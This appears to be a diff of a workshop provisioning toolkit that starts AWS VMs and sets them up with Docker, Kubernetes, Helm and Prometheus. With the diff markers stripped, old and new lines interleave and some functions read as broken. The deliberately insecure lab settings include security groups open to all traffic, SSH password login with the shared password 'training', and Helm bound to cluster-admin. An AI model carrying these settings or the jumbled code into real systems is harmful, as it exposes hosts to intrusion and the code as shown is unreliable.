info "$0 deploy $TAG <settings/somefile.yaml>"
}
_cmd opensg "Open the default security group to ALL ingress traffic"
_cmd_opensg() {
need_infra $1
infra_opensg
}
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol icmp \
--port -1 \
--cidr 0.0.0.0/0
_cmd disableaddrchecks "Disable source/destination IP address checks"
_cmd_disableaddrchecks() {
TAG=$1
need_tag
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol udp \
--port 0-65535 \
--cidr 0.0.0.0/0
infra_disableaddrchecks
}
_cmd pssh "Run an arbitrary command on all nodes"
_cmd_pssh() {
TAG=$1
need_tag
shift
pssh "$@"
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol tcp \
--port 0-65535 \
--cidr 0.0.0.0/0
}
_cmd pull_images "Pre-pull a bunch of Docker images"
_cmd_pull_images() {
TAG=$1
need_tag
pull_tag
need_tag $TAG
pull_tag $TAG
}
_cmd quotas "Check our infrastructure quotas (max instances)"
_cmd_quotas() {
need_infra $1
infra_quotas
}
_cmd retag "(FIXME) Apply a new tag to a group of VMs"
_cmd retag "Apply a new tag to a batch of VMs"
_cmd_retag() {
OLDTAG=$1
NEWTAG=$2
TAG=$OLDTAG
need_tag
need_tag $OLDTAG
if [[ -z "$NEWTAG" ]]; then
die "You must specify a new tag to apply."
fi
aws_tag_instances $OLDTAG $NEWTAG
}
_cmd ssh "Open an SSH session to the first node of a tag"
_cmd_ssh() {
TAG=$1
need_tag
IP=$(head -1 tags/$TAG/ips.txt)
info "Logging into $IP"
ssh docker@$IP
}
_cmd start "Start a group of VMs"
_cmd start "Start a batch of VMs"
_cmd_start() {
while [ ! -z "$*" ]; do
case "$1" in
--infra) INFRA=$2; shift 2;;
--settings) SETTINGS=$2; shift 2;;
--count) COUNT=$2; shift 2;;
--tag) TAG=$2; shift 2;;
*) die "Unrecognized parameter: $1."
esac
done
# Number of instances to create
COUNT=$1
# Optional settings file (to carry on with deployment)
SETTINGS=$2
if [ -z "$INFRA" ]; then
die "Please add --infra flag to specify which infrastructure file to use."
fi
if [ -z "$SETTINGS" ]; then
die "Please add --settings flag to specify which settings file to use."
fi
if [ -z "$COUNT" ]; then
COUNT=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
warning "No --count option was specified. Using value from settings file ($COUNT)."
die "Indicate number of instances to start."
fi
# Check that the specified settings and infrastructure are valid.
need_settings $SETTINGS
need_infra $INFRA
# Print our AWS username, to ease the pain of credential-juggling
greet
if [ -z "$TAG" ]; then
TAG=$(make_tag)
# Upload our SSH keys to AWS if needed, to be added to each VM's authorized_keys
key_name=$(sync_keys)
AMI=$(_cmd_ami) # Retrieve the AWS image ID
if [ -z "$AMI" ]; then
die "I could not find which AMI to use in this region. Try another region?"
fi
mkdir -p tags/$TAG
ln -s ../../$INFRA tags/$TAG/infra.sh
ln -s ../../$SETTINGS tags/$TAG/settings.yaml
echo creating > tags/$TAG/status
TOKEN=$(get_token) # generate a timestamp token for this batch of VMs
AWS_KEY_NAME=$(make_key_name)
sep "Starting instances"
info " Count: $COUNT"
info " Region: $AWS_DEFAULT_REGION"
info " Token/tag: $TOKEN"
info " AMI: $AMI"
info " Key name: $AWS_KEY_NAME"
result=$(aws ec2 run-instances \
--key-name $AWS_KEY_NAME \
--count $COUNT \
--instance-type ${AWS_INSTANCE_TYPE-t2.medium} \
--client-token $TOKEN \
--image-id $AMI)
reservation_id=$(echo "$result" | head -1 | awk '{print $2}')
info "Reservation ID: $reservation_id"
sep
# if instance creation succeeded, we should have some IDs
IDS=$(aws_get_instance_ids_by_client_token $TOKEN)
if [ -z "$IDS" ]; then
die "Instance creation failed."
fi
# Tag these new instances with a tag that is the same as the token
TAG=$TOKEN
aws_tag_instances $TOKEN $TAG
wait_until_tag_is_running $TAG $COUNT
infra_start $COUNT
sep
info "Successfully created $COUNT instances with tag $TAG"
sep
echo created > tags/$TAG/status
info "To deploy Docker on these instances, you can run:"
info "$0 deploy $TAG"
info "To terminate these instances, you can run:"
info "$0 stop $TAG"
mkdir -p tags/$TAG
IPS=$(aws_get_instance_ips_by_tag $TAG)
echo "$IPS" >tags/$TAG/ips.txt
link_tag $TAG
if [ -n "$SETTINGS" ]; then
_cmd_deploy $TAG $SETTINGS
else
info "To deploy or kill these instances, run one of the following:"
info "$0 deploy $TAG <settings/somefile.yaml>"
info "$0 stop $TAG"
fi
}
_cmd ec2quotas "Check our EC2 quotas (max instances)"
_cmd_ec2quotas() {
greet
max_instances=$(aws ec2 describe-account-attributes \
--attribute-names max-instances \
--query 'AccountAttributes[*][AttributeValues]')
info "In the current region ($AWS_DEFAULT_REGION) you can deploy up to $max_instances instances."
# Print list of AWS EC2 regions, highlighting ours ($AWS_DEFAULT_REGION) in the list
# If our $AWS_DEFAULT_REGION is not valid, the error message will be pretty descriptive:
# Could not connect to the endpoint URL: "https://ec2.foo.amazonaws.com/"
info "Available regions:"
aws ec2 describe-regions | awk '{print $3}' | grep --color=auto $AWS_DEFAULT_REGION -C50
}
_cmd stop "Stop (terminate, shutdown, kill, remove, destroy...) instances"
_cmd_stop() {
TAG=$1
need_tag
infra_stop
echo stopped > tags/$TAG/status
need_tag $TAG
aws_kill_instances_by_tag $TAG
}
_cmd tags "List groups of VMs known locally"
_cmd_tags() {
(
cd tags
echo "[#] [Status] [Tag] [Infra]" \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
for tag in *; do
if [ -f $tag/ips.txt ]; then
count="$(wc -l < $tag/ips.txt)"
else
count="?"
fi
if [ -f $tag/status ]; then
status="$(cat $tag/status)"
else
status="?"
fi
if [ -f $tag/infra.sh ]; then
infra="$(basename $(readlink $tag/infra.sh))"
else
infra="?"
fi
echo "$count $status $tag $infra" \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
done
)
}
_cmd test "Run tests (pre-flight checks) on a group of VMs"
_cmd test "Run tests (pre-flight checks) on a batch of VMs"
_cmd_test() {
TAG=$1
need_tag
test_tag
need_tag $TAG
test_tag $TAG
}
_cmd helmprom "Install Helm and Prometheus"
_cmd_helmprom() {
TAG=$1
need_tag
pssh "
if i_am_first_node; then
kubectl -n kube-system get serviceaccount helm ||
kubectl -n kube-system create serviceaccount helm
sudo -u docker -H helm init --service-account helm
kubectl get clusterrolebinding helm-can-do-everything ||
kubectl create clusterrolebinding helm-can-do-everything \
--clusterrole=cluster-admin \
--serviceaccount=kube-system:helm
sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
--namespace kube-system \
--set server.service.type=NodePort \
--set server.service.nodePort=30090 \
--set server.persistentVolume.enabled=false \
--set alertmanager.enabled=false
fi"
}
# Sometimes, weave fails to come up on some nodes.
# Symptom: the pods on a node are unreachable (they don't even ping).
# Remedy: wipe out Weave state and delete weave pod on that node.
# Specifically, identify the weave pod that is defective, then:
# kubectl -n kube-system exec weave-net-XXXXX -c weave rm /weavedb/weave-netdata.db
# kubectl -n kube-system delete pod weave-net-XXXXX
_cmd weavetest "Check that weave seems properly setup"
_cmd_weavetest() {
TAG=$1
need_tag
pssh "
kubectl -n kube-system get pods -o name | grep weave | cut -d/ -f2 |
xargs -I POD kubectl -n kube-system exec POD -c weave -- \
sh -c \"./weave --local status | grep Connections | grep -q ' 1 failed' || ! echo POD \""
}
###
greet() {
IAMUSER=$(aws iam get-user --query 'User.UserName')
info "Hello! You seem to be UNIX user $USER, and IAM user $IAMUSER."
}
link_tag() {
TAG=$1
need_tag $TAG
IPS_FILE=tags/$TAG/ips.txt
need_ips_file $IPS_FILE
ln -sf $IPS_FILE ips.txt
}
pull_tag() {
TAG=$1
need_tag $TAG
link_tag $TAG
if [ ! -s $IPS_FILE ]; then
die "Nonexistent or empty IPs file $IPS_FILE."
fi
# Pre-pull a bunch of images
pssh --timeout 900 'for I in \
debian:latest \
ubuntu:latest \
fedora:latest \
centos:latest \
elasticsearch:2 \
postgres \
redis \
alpine \
registry \
nicolaka/netshoot \
jpetazzo/trainingwheels \
golang \
training/namer \
dockercoins/hasher \
dockercoins/rng \
dockercoins/webui \
dockercoins/worker \
logstash \
prom/node-exporter \
google/cadvisor \
dockersamples/visualizer \
nathanleclaire/redisonrails; do
debian:latest \
ubuntu:latest \
fedora:latest \
centos:latest \
elasticsearch:2 \
postgres \
redis \
alpine \
registry \
nicolaka/netshoot \
jpetazzo/trainingwheels \
golang \
training/namer \
dockercoins/hasher \
dockercoins/rng \
dockercoins/webui \
dockercoins/worker \
logstash \
prom/node-exporter \
google/cadvisor \
dockersamples/visualizer \
nathanleclaire/redisonrails; do
sudo -u docker docker pull $I
done'
info "Finished pulling images for $TAG."
info "You may now want to run:"
info "$0 cards $TAG <settings/somefile.yaml>"
}
wait_until_tag_is_running() {
max_retry=50
TAG=$1
COUNT=$2
i=0
done_count=0
while [[ $done_count -lt $COUNT ]]; do
let "i += 1"
info "$(printf "%d/%d instances online" $done_count $COUNT)"
done_count=$(aws ec2 describe-instances \
--filters "Name=instance-state-name,Values=running" \
"Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].State.Name" \
| tr "\t" "\n" \
| wc -l)
if [[ $i -gt $max_retry ]]; then
die "Timed out while waiting for instance creation (after $max_retry retries)"
fi
sleep 1
done
}
tag_is_reachable() {
TAG=$1
need_tag $TAG
link_tag $TAG
pssh -t 5 true 2>&1 >/dev/null
}
test_tag() {
TAG=$1
ips_file=tags/$TAG/ips.txt
info "Picking a random IP address in $ips_file to run tests."
ip=$(shuf -n1 $ips_file)
n=$((1 + $RANDOM % $(wc -l <$ips_file)))
ip=$(head -n $n $ips_file | tail -n 1)
test_vm $ip
info "Tests complete."
}
@@ -593,8 +484,8 @@ test_vm() {
for cmd in "hostname" \
"whoami" \
"hostname -i" \
"ls -l /usr/local/bin/i_am_first_node" \
"grep . /etc/name_of_first_node /etc/ipv4_of_first_node" \
"cat /tmp/node" \
"cat /tmp/ipv4" \
"cat /etc/hosts" \
"hostnamectl status" \
"docker version | grep Version -B1" \
@@ -655,9 +546,17 @@ sync_keys() {
fi
}
make_tag() {
get_token() {
if [ -z $USER ]; then
export USER=anonymous
fi
date +%Y-%m-%d-%H-%M-$USER
}
describe_tag() {
# Display instance details and reachability/status information
TAG=$1
need_tag $TAG
aws_display_instances_by_tag $TAG
aws_display_instance_statuses_by_tag $TAG
}

View File

@@ -1,30 +0,0 @@
# Default stub functions for infrastructure libraries.
# When loading an infrastructure library, these functions will be overridden.
infra_list() {
warning "infra_list is unsupported on $INFRACLASS."
}
infra_quotas() {
warning "infra_quotas is unsupported on $INFRACLASS."
}
infra_start() {
warning "infra_start is unsupported on $INFRACLASS."
}
infra_stop() {
warning "infra_stop is unsupported on $INFRACLASS."
}
infra_quotas() {
warning "infra_quotas is unsupported on $INFRACLASS."
}
infra_opensg() {
warning "infra_opensg is unsupported on $INFRACLASS."
}
infra_disableaddrchecks() {
warning "infra_disableaddrchecks is unsupported on $INFRACLASS."
}

View File

@@ -1,216 +0,0 @@
infra_list() {
aws_display_tags
}
infra_quotas() {
greet
max_instances=$(aws ec2 describe-account-attributes \
--attribute-names max-instances \
--query 'AccountAttributes[*][AttributeValues]')
info "In the current region ($AWS_DEFAULT_REGION) you can deploy up to $max_instances instances."
# Print list of AWS EC2 regions, highlighting ours ($AWS_DEFAULT_REGION) in the list
# If our $AWS_DEFAULT_REGION is not valid, the error message will be pretty descriptive:
# Could not connect to the endpoint URL: "https://ec2.foo.amazonaws.com/"
info "Available regions:"
aws ec2 describe-regions | awk '{print $3}' | grep --color=auto $AWS_DEFAULT_REGION -C50
}
infra_start() {
COUNT=$1
# Print our AWS username, to ease the pain of credential-juggling
greet
# Upload our SSH keys to AWS if needed, to be added to each VM's authorized_keys
key_name=$(sync_keys)
AMI=$(aws_get_ami) # Retrieve the AWS image ID
if [ -z "$AMI" ]; then
die "I could not find which AMI to use in this region. Try another region?"
fi
AWS_KEY_NAME=$(make_key_name)
AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}
sep "Starting instances"
info " Count: $COUNT"
info " Region: $AWS_DEFAULT_REGION"
info " Token/tag: $TAG"
info " AMI: $AMI"
info " Key name: $AWS_KEY_NAME"
info " Instance type: $AWS_INSTANCE_TYPE"
result=$(aws ec2 run-instances \
--key-name $AWS_KEY_NAME \
--count $COUNT \
--instance-type $AWS_INSTANCE_TYPE \
--client-token $TAG \
--block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
--image-id $AMI)
reservation_id=$(echo "$result" | head -1 | awk '{print $2}')
info "Reservation ID: $reservation_id"
sep
# if instance creation succeeded, we should have some IDs
IDS=$(aws_get_instance_ids_by_client_token $TAG)
if [ -z "$IDS" ]; then
die "Instance creation failed."
fi
# Tag these new instances with a tag that is the same as the token
aws_tag_instances $TAG $TAG
# Wait until EC2 API tells us that the instances are running
wait_until_tag_is_running $TAG $COUNT
aws_get_instance_ips_by_tag $TAG > tags/$TAG/ips.txt
}
infra_stop() {
aws_kill_instances_by_tag
}
infra_opensg() {
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol icmp \
--port -1 \
--cidr 0.0.0.0/0
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol udp \
--port 0-65535 \
--cidr 0.0.0.0/0
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol tcp \
--port 0-65535 \
--cidr 0.0.0.0/0
}
infra_disableaddrchecks() {
IDS=$(aws_get_instance_ids_by_tag $TAG)
for ID in $IDS; do
info "Disabling source/destination IP checks on: $ID"
aws ec2 modify-instance-attribute --source-dest-check "{\"Value\": false}" --instance-id $ID
done
}
wait_until_tag_is_running() {
max_retry=100
i=0
done_count=0
while [[ $done_count -lt $COUNT ]]; do
let "i += 1"
info "$(printf "%d/%d instances online" $done_count $COUNT)"
done_count=$(aws ec2 describe-instances \
--filters "Name=tag:Name,Values=$TAG" \
"Name=instance-state-name,Values=running" \
--query "length(Reservations[].Instances[])")
if [[ $i -gt $max_retry ]]; then
die "Timed out while waiting for instance creation (after $max_retry retries)"
fi
sleep 1
done
}
aws_display_tags() {
# Print all "Name" tags in our region with their instance count
echo "[#] [Status] [Token] [Tag]" \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
aws ec2 describe-instances \
--query "Reservations[*].Instances[*].[State.Name,ClientToken,Tags[0].Value]" \
| tr -d "\r" \
| uniq -c \
| sort -k 3 \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
}
aws_get_tokens() {
aws ec2 describe-instances --output text \
--query 'Reservations[*].Instances[*].[ClientToken]' \
| sort -u
}
aws_display_instance_statuses_by_tag() {
IDS=$(aws ec2 describe-instances \
--filters "Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].InstanceId" | tr '\t' ' ')
aws ec2 describe-instance-status \
--instance-ids $IDS \
--query "InstanceStatuses[*].{ID:InstanceId,InstanceState:InstanceState.Name,InstanceStatus:InstanceStatus.Status,SystemStatus:SystemStatus.Status,Reachability:InstanceStatus.Status}" \
--output table
}
aws_display_instances_by_tag() {
result=$(aws ec2 describe-instances --output table \
--filter "Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].[ \
InstanceId, \
State.Name, \
Tags[0].Value, \
PublicIpAddress, \
InstanceType \
]"
)
if [[ -z $result ]]; then
die "No instances found with tag $TAG in region $AWS_DEFAULT_REGION."
else
echo "$result"
fi
}
aws_get_instance_ids_by_filter() {
FILTER=$1
aws ec2 describe-instances --filters $FILTER \
--query Reservations[*].Instances[*].InstanceId \
--output text | tr "\t" "\n" | tr -d "\r"
}
aws_get_instance_ids_by_client_token() {
TOKEN=$1
aws_get_instance_ids_by_filter Name=client-token,Values=$TOKEN
}
aws_get_instance_ids_by_tag() {
aws_get_instance_ids_by_filter Name=tag:Name,Values=$TAG
}
aws_get_instance_ips_by_tag() {
aws ec2 describe-instances --filter "Name=tag:Name,Values=$TAG" \
--output text \
--query "Reservations[*].Instances[*].PublicIpAddress" \
| tr "\t" "\n" \
| sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 # sort IPs
}
aws_kill_instances_by_tag() {
IDS=$(aws_get_instance_ids_by_tag $TAG)
if [ -z "$IDS" ]; then
die "Invalid tag."
fi
info "Deleting instances with tag $TAG."
aws ec2 terminate-instances --instance-ids $IDS \
| grep ^TERMINATINGINSTANCES
info "Deleted instances with tag $TAG."
}
aws_tag_instances() {
OLD_TAG_OR_TOKEN=$1
NEW_TAG=$2
IDS=$(aws_get_instance_ids_by_client_token $OLD_TAG_OR_TOKEN)
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
IDS=$(aws_get_instance_ids_by_tag $OLD_TAG_OR_TOKEN)
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
}
aws_get_ami() {
##VERSION##
find_ubuntu_ami -r $AWS_DEFAULT_REGION -a amd64 -v 18.04 -t hvm:ebs -N -q
}

View File

@@ -1,8 +0,0 @@
infra_start() {
COUNT=$1
info "You should now run your provisioning commands for $COUNT machines."
info "Note: no machines have been automatically created!"
info "Once done, put the list of IP addresses in tags/$TAG/ips.txt"
info "(one IP address per line, without any comments or extra lines)."
touch tags/$TAG/ips.txt
}

View File

@@ -1,20 +0,0 @@
infra_start() {
COUNT=$1
cp terraform/*.tf tags/$TAG
(
cd tags/$TAG
terraform init
echo prefix = \"$TAG\" >> terraform.tfvars
echo count = \"$COUNT\" >> terraform.tfvars
terraform apply -auto-approve
terraform output ip_addresses > ips.txt
)
}
infra_stop() {
(
cd tags/$TAG
terraform destroy -auto-approve
)
}

View File

@@ -1,4 +1,4 @@
#!/usr/bin/env python3
#!/usr/bin/env python
import os
import sys
import yaml
@@ -31,13 +31,7 @@ while ips:
clusters.append(cluster)
template_file_name = SETTINGS["cards_template"]
template_file_path = os.path.join(
os.path.dirname(__file__),
"..",
"templates",
template_file_name
)
template = jinja2.Template(open(template_file_path).read())
template = jinja2.Template(open(template_file_name).read())
with open("ips.html", "w") as f:
f.write(template.render(clusters=clusters, **SETTINGS))
print("Generated ips.html")

View File

@@ -12,7 +12,6 @@ config = yaml.load(open("/tmp/settings.yaml"))
COMPOSE_VERSION = config["compose_version"]
MACHINE_VERSION = config["machine_version"]
CLUSTER_SIZE = config["clustersize"]
CLUSTER_PREFIX = config["clusterprefix"]
ENGINE_VERSION = config["engine_version"]
DOCKER_USER_PASSWORD = config["docker_user_password"]
@@ -84,7 +83,7 @@ system("sudo sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/' /e
system("sudo service ssh restart")
system("sudo apt-get -q update")
system("sudo apt-get -qy install git jq")
system("sudo apt-get -qy install git jq python-pip")
#######################
### DOCKER INSTALLS ###
@@ -99,6 +98,7 @@ system("sudo apt-get -q update")
system("sudo apt-get -qy install docker-ce")
### Install docker-compose
#system("sudo pip install -U docker-compose=={}".format(COMPOSE_VERSION))
system("sudo curl -sSL -o /usr/local/bin/docker-compose https://github.com/docker/compose/releases/download/{}/docker-compose-{}-{}".format(COMPOSE_VERSION, platform.system(), platform.machine()))
system("sudo chmod +x /usr/local/bin/docker-compose")
system("docker-compose version")
@@ -122,7 +122,7 @@ addresses = list(l.strip() for l in sys.stdin)
assert ipv4 in addresses
def makenames(addrs):
return [ "%s%s"%(CLUSTER_PREFIX, i+1) for i in range(len(addrs)) ]
return [ "node%s"%(i+1) for i in range(len(addrs)) ]
while addresses:
cluster = addresses[:CLUSTER_SIZE]
@@ -136,21 +136,15 @@ while addresses:
print(cluster)
mynode = cluster.index(ipv4) + 1
system("echo {}{} | sudo tee /etc/hostname".format(CLUSTER_PREFIX, mynode))
system("sudo hostname {}{}".format(CLUSTER_PREFIX, mynode))
system("echo node{} | sudo -u docker tee /tmp/node".format(mynode))
system("echo node{} | sudo tee /etc/hostname".format(mynode))
system("sudo hostname node{}".format(mynode))
system("sudo -u docker mkdir -p /home/docker/.ssh")
system("sudo -u docker touch /home/docker/.ssh/authorized_keys")
# Create a convenience file to easily check if we're the first node
if ipv4 == cluster[0]:
system("sudo ln -sf /bin/true /usr/local/bin/i_am_first_node")
# On the first node, if we don't have a private key, generate one (with empty passphrase)
# If I'm node1 and don't have a private key, generate one (with empty passphrase)
system("sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || sudo -u docker ssh-keygen -t rsa -f /home/docker/.ssh/id_rsa -P ''")
else:
system("sudo ln -sf /bin/false /usr/local/bin/i_am_first_node")
# Record the IPV4 and name of the first node
system("echo {} | sudo tee /etc/ipv4_of_first_node".format(cluster[0]))
system("echo {} | sudo tee /etc/name_of_first_node".format(names[0]))
FINISH = time.time()
duration = "Initial deployment took {}s".format(str(FINISH - START)[:5])

View File

@@ -1,17 +1,12 @@
# This file can be sourced in order to directly run commands on
# a group of VMs whose IPs are located in ips.txt of the directory in which
# a batch of VMs whose IPs are located in ips.txt of the directory in which
# the command is run.
pssh() {
if [ -z "$TAG" ]; then
>/dev/stderr echo "Variable \$TAG is not set."
return
fi
HOSTFILE="tags/$TAG/ips.txt"
HOSTFILE="ips.txt"
[ -f $HOSTFILE ] || {
>/dev/stderr echo "Hostfile $HOSTFILE not found."
>/dev/stderr echo "No hostfile found at $HOSTFILE"
return
}

View File

@@ -1,28 +0,0 @@
# Number of VMs per cluster
clustersize: 1
# The hostname of each node will be clusterprefix + a number
clusterprefix: dmuc
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -1,28 +0,0 @@
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: kubenet
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -1,28 +0,0 @@
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: kuberouter
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -1,28 +0,0 @@
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: test
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -1,8 +1,5 @@
# Number of VMs per cluster
clustersize: 5
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: clusters.csv

View File

@@ -3,9 +3,6 @@
# Number of VMs per cluster
clustersize: 5
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
@@ -23,7 +20,7 @@ paper_margin: 0.2in
engine_version: test
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
compose_version: 1.18.0
machine_version: 0.13.0
# Password used to connect with the "docker user"

View File

@@ -3,9 +3,6 @@
# Number of VMs per cluster
clustersize: 1
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
@@ -23,8 +20,8 @@ paper_margin: 0.2in
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.15.0
compose_version: 1.21.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training
docker_user_password: training

View File

@@ -1,29 +0,0 @@
# Number of VMs per cluster
clustersize: 4
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -0,0 +1,106 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://container.training/" -%}
{%- set pagesize = 12 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "Kubernetes workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_kube -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 14px;
}
table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}
div {
float: left;
border: 1px dotted black;
padding-top: 1%;
padding-bottom: 1%;
/* columns * (width+left+right) < 100% */
width: 21.5%;
padding-left: 1.5%;
padding-right: 1.5%;
}
p {
margin: 0.4em 0 0.4em 0;
}
img {
height: 4em;
float: right;
margin-right: -0.4em;
}
.logpass {
font-family: monospace;
font-weight: bold;
}
.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>
<p>
Here is the connection information to your very own
{{ cluster_or_machine }} for this {{ workshop_name }}.
You can connect to {{ this_or_each }} VM with any SSH client.
</p>
<p>
<img src="{{ image_src }}" />
<table>
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>
</p>
<p>
Your {{ machine_is_or_machines_are }}:
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>You can find the slides at:
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>

View File

@@ -3,11 +3,8 @@
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
cards_template: settings/kube101.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
@@ -23,9 +20,8 @@ paper_margin: 0.2in
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
compose_version: 1.21.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -3,9 +3,6 @@
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
@@ -23,8 +20,8 @@ paper_margin: 0.2in
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.15.0
compose_version: 1.21.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -1,66 +0,0 @@
#!/bin/sh
set -e
export AWS_INSTANCE_TYPE=t3a.small
INFRA=infra/aws-us-west-2
STUDENTS=2
PREFIX=$(date +%Y-%m-%d-%H-%M)
SETTINGS=admin-dmuc
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $STUDENTS
./workshopctl deploy $TAG
./workshopctl disabledocker $TAG
./workshopctl kubebins $TAG
